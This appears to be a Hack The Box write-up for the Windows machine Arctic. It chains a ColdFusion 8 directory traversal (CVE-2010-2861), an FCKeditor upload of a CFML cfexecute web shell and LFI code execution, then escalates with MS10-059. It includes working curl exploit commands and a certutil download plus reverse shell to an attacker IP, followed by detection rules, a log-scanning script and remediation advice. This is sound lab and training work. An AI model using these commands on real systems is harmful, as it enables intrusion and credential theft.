
HTB: Arctic

16 min · easy · Windows · Arctic

Adobe ColdFusion 8 on Windows Server 2008 R2 yields unauthenticated RCE through a three-part chain: directory traversal for credential extraction, FCKeditor file upload, and LFI-based CFML code injection. MS10-059 escalates to SYSTEM when JuicyPotato fails.

Overview

Arctic runs Adobe ColdFusion 8.0.1 on Windows Server 2008 R2 SP0, with the ColdFusion JRun web server listening on port 8500. Every HTTP request takes 30 to 60 seconds to respond, which shapes the entire engagement.

The standard exploitation path for ColdFusion 8 uses the administrator’s scheduled task feature to download a JSP shell. On this target, the scheduled task URL field is broken (possibly due to the server’s Greek locale), requiring an alternative approach. The chain I use combines three vulnerabilities: a directory traversal (CVE-2010-2861) that extracts the admin password hash, an unauthenticated FCKeditor file upload, and an LFI that includes the uploaded file into a CFML template, causing ColdFusion to execute embedded <cfexecute> tags. This last step is less commonly documented than the scheduled task approach but bypasses the need for admin panel access entirely.

Privilege escalation uses MS10-059 (Chimichurri) because the more common JuicyPotato fails in the cfexecute process context despite the service account holding SeImpersonatePrivilege.

Reconnaissance

I start with a service-version scan:

nmap -sC -sV -A -T4 -oA scans/arctic 10.129.15.232
| Port  | Service | Product / Version     | Notes                         |
|-------|---------|-----------------------|-------------------------------|
| 135   | MSRPC   | Microsoft Windows RPC | Standard Windows service      |
| 8500  | fmtp?   | JRun Web Server       | ColdFusion application server |
| 49154 | MSRPC   | Microsoft Windows RPC | Dynamic RPC endpoint          |

Nmap does not fingerprint JRun on port 8500. Browsing to http://10.129.15.232:8500/ reveals a directory listing with CFIDE/ and cfdocs/, immediately identifying Adobe ColdFusion. The admin panel is accessible at /CFIDE/administrator/.

| Component        | Version                                   |
|------------------|-------------------------------------------|
| Operating System | Windows Server 2008 R2 SP0 x64 (6.1.7600) |
| Web Server       | JRun Web Server (ColdFusion built-in)     |
| Application      | Adobe ColdFusion 8.0.1                    |
| Locale           | Greek (el)                                |

Attack Surface Analysis

ColdFusion 8 exposes several default administrative paths:

  • /CFIDE/administrator/: admin login panel (enter.cfm)
  • /CFIDE/scripts/ajax/FCKeditor/: bundled FCKeditor with file upload
  • /cfdocs/: ColdFusion documentation

The FCKeditor file manager connector accepts unauthenticated POST requests. Uploaded files are stored in /userfiles/file/. Executable extensions (.cfm, .jsp, .cfc) are blocked, but .txt files are permitted.

| CVE           | Description                                    | Status    |
|---------------|------------------------------------------------|-----------|
| CVE-2010-2861 | Directory traversal in locale parameter        | Exploited |
| MS10-059      | Kernel privilege escalation (KB982799 missing) | Exploited |
| FCKeditor     | Unauthenticated file upload (.txt only)        | Exploited |

Vulnerability Analysis

CVE-2010-2861: directory traversal

The locale parameter on /CFIDE/administrator/enter.cfm loads localisation resource files. The parameter is concatenated into a file path without sanitisation. Directory traversal sequences (../) navigate to arbitrary files, and a null byte (%00) truncates the path extension. The included content renders into the page’s <title> tag.

Critically, this is not merely a file read. ColdFusion’s template engine processes CFML tags in the included content, so a file read turns into code execution whenever the included file contains CFML markup.

FCKeditor unauthenticated upload

ColdFusion 8 bundles FCKeditor with an upload connector that requires no authentication. The connector blocks executable extensions (.cfm, .jsp) but permits .txt uploads. Alone, this is a medium-severity finding. Combined with the LFI, it becomes the code execution vector.

| Attribute    | Value                                                     |
|--------------|-----------------------------------------------------------|
| CVE          | CVE-2010-2861                                             |
| CVSS v3      | 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)                 |
| CWE          | CWE-22 (Path Traversal), CWE-94 (Code Injection)          |
| Root cause   | Unsanitised locale parameter + CFML template inclusion    |
| MITRE ATT&CK | T1190 (Exploit Public-Facing Application)                 |

Exploitation

Step 1: Extract the admin password hash

curl -s "http://10.129.15.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en" \
  | grep -o '<title>[^<]*</title>'
<title>password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
rdspassword=0IA/F1WR9X3UwihR45hLaf..
</title>

ColdFusion 8 stores passwords as unsalted SHA-1. The hash cracks instantly:

echo -n "happyday" | sha1sum
# 2f635f6d20e3fde0c53075a84b68fb07dcec9b03  -

Step 2: Upload CFML shell via FCKeditor

cat > shell.txt << 'EOF'
<cfexecute name="cmd.exe" arguments="/c #URL.c#"
  timeout="10" variable="output"></cfexecute>
<cfoutput>#output#</cfoutput>
EOF

# NewFile is the multipart field name the FCKeditor connector reads
curl -s -F "NewFile=@shell.txt" \
  "http://10.129.15.232:8500/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/"

Response code 0 indicates success. The file is accessible at /userfiles/file/shell.txt.

Step 3: LFI + CFML injection for RCE

The LFI includes shell.txt into enter.cfm. ColdFusion processes the <cfexecute> tags during page rendering:

curl -s "http://10.129.15.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/wwwroot/userfiles/file/shell.txt%00en&c=whoami" \
  | grep -o '<title>[^<]*</title>'
<title>arctic\tolis
</title>

RCE confirmed as arctic\tolis. The command output appears in the <title> tag because the LFI inclusion point is within the HTML <head>.

Step 4: Privilege escalation via MS10-059

System enumeration reveals Windows Server 2008 R2 build 7600 with zero hotfixes. The tolis account has SeImpersonatePrivilege, but JuicyPotato fails because cfexecute spawns child processes in a restricted 32-bit context without COM object access.

MS10-059 (Chimichurri) targets a kernel vulnerability in the Tracing Feature for Services. The x86 binary is required because ColdFusion 8 runs 32-bit Java under WoW64:

# Upload via certutil
curl -s "...&c=certutil+-urlcache+-split+-f+http://10.10.14.110:8080/ms.exe+C:\Windows\Temp\ms.exe"

# Execute (with listener on attacker: ncat -lvnp 4444)
curl -s "...&c=C:\Windows\Temp\ms.exe+10.10.14.110+4444"
C:\ColdFusion8\runtime\bin> whoami
nt authority\system

Post-Exploitation

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix"
# OS Name:     Microsoft Windows Server 2008 R2 Standard
# OS Version:  6.1.7600 N/A Build 7600
# Hotfix(s):   N/A

whoami /priv
# SeChangeNotifyPrivilege    Enabled
# SeImpersonatePrivilege     Enabled
# SeCreateGlobalPrivilege    Enabled

Zero hotfixes: this is the RTM release with no service packs or updates. Every component is beyond end-of-life: ColdFusion 8 (released 2009), JRun (discontinued), FCKeditor (replaced by CKEditor in 2009).

Defensive Analysis

Detection opportunities

| Phase           | MITRE ATT&CK | Detection                                                  |
|-----------------|--------------|------------------------------------------------------------|
| Initial access  | T1190        | Web logs: locale parameter containing ../ or %00           |
| Credential      | T1552.001    | Web logs: LFI targeting password.properties                |
| Execution       | T1059.003    | Process monitoring: cmd.exe spawned by jrun.exe            |
| Privilege esc.  | T1068        | Sysmon: executable in C:\Windows\Temp\ spawned by Java     |
| Defence evasion | T1036        | Sysmon: certutil used as download cradle                   |

Web server logs: Requests where the locale parameter exceeds 30 characters or contains traversal sequences (../, %2e%2e) are high-fidelity indicators. The same applies to POST requests to the FCKeditor upload connector.

Process monitoring: cmd.exe spawned as a child of jrun.exe or java.exe is anomalous. Executables running from C:\Windows\Temp\ with a Java process as parent should trigger immediate investigation.

certutil abuse: certutil -urlcache -f is a well-known living-off-the-land download technique. Sysmon and EDR tools should flag this command pattern.
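The web-log indicators above, turned into a small detector as an added example (not part of the original write-up). It assumes common-log-format access lines; the sample lines are constructed, and the 30-character threshold, traversal patterns and FCKeditor connector path come from the text.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed common-log-format lines (not captured from the real box):
# client - - [timestamp] "METHOD path HTTP/1.x" status bytes
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 3311
10.0.0.9 - - [01/Jan/2024:10:01:45 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 412
10.0.0.9 - - [01/Jan/2024:10:02:50 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2FColdFusion8%2Fwwwroot%2Fuserfiles%2Ffile%2Fshell.txt%00en&c=whoami HTTP/1.1" 200 2780
10.0.0.7 - - [01/Jan/2024:10:03:12 +0000] "GET /cfdocs/index.htm HTTP/1.1" 200 9001
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$')
TRAVERSAL = re.compile(r'(\.\./|\.\.\\|%00|\x00)', re.IGNORECASE)
FCK_CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"

def analyse_request(method, url):
    """Return a list of alert reasons for one request; empty means benign."""
    reasons = []
    parts = urlsplit(url)
    path = unquote(parts.path).lower()
    # parse_qsl decodes percent-encoding once; decode again to catch double encoding (%252e)
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() == "locale":
            decoded = unquote(value)
            if TRAVERSAL.search(decoded) or len(value) > 30:
                reasons.append("locale traversal/overlong")
            if "password.properties" in decoded.lower():
                reasons.append("password.properties read")
    if method == "POST" and FCK_CONNECTOR in path:
        reasons.append("FCKeditor connector upload")
    return reasons

def scan_log(text):
    """Parse each log line and return (ip, url, reasons) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        reasons = analyse_request(m["method"], m["url"])
        if reasons:
            hits.append((m["ip"], m["url"], reasons))
    return hits

if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(reasons)}  ::  {url[:80]}")
```

Three of the five constructed lines are flagged; the benign locale=en request and the /cfdocs/ browse are not.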

Remediation

| Priority | Action                                                         | Effort | Impact   |
|----------|----------------------------------------------------------------|--------|----------|
| P0       | Decommission: CF8 and Server 2008 R2 are both EOL              | High   | Critical |
| P1       | Apply APSB10-18 (Adobe security bulletin for CVE-2010-2861)    | Low    | High     |
| P1       | Firewall port 8500 from untrusted networks                     | Low    | High     |
| P2       | Remove FCKeditor or restrict upload to authenticated users     | Low    | Medium   |
| P2       | Apply KB982799 (MS10-059)                                      | Low    | Medium   |
| P3       | Upgrade to current supported versions                          | High   | Medium   |

No combination of patches will bring this system to a defensible state. Every component is beyond end-of-life with no vendor support. The correct remediation is decommission and rebuild on current software.

Key Takeaways

  1. LFI in CFML templates is code execution, not just file read. ColdFusion’s template engine processes CFML tags in included content. Any writable location (FCKeditor uploads, temp directories, log files) becomes a code execution vector when combined with LFI. The same principle applies to PHP’s include() and JSP’s <jsp:include>.

  2. Architecture matters for exploit binaries. ColdFusion 8 runs 32-bit Java under WoW64 on 64-bit Windows. All child processes inherit the 32-bit context. JuicyPotato x64 fails with an architecture mismatch, and even the x86 build fails because COM objects are inaccessible from the constrained cfexecute context. Always verify the process architecture before uploading binaries.

  3. Slow targets require persistent infrastructure. Arctic’s 30 to 60 second response time means every command takes a full minute. HTTP servers must survive session interruptions (nohup). Plan for latency in your tooling and workflow.

  4. When the standard path is broken, find another. The scheduled task approach (the “standard” ColdFusion 8 exploit) failed because the URL field was broken. The LFI + CFML injection chain achieves the same result through a different mechanism. Flexibility in methodology is more valuable than memorising a single exploit path.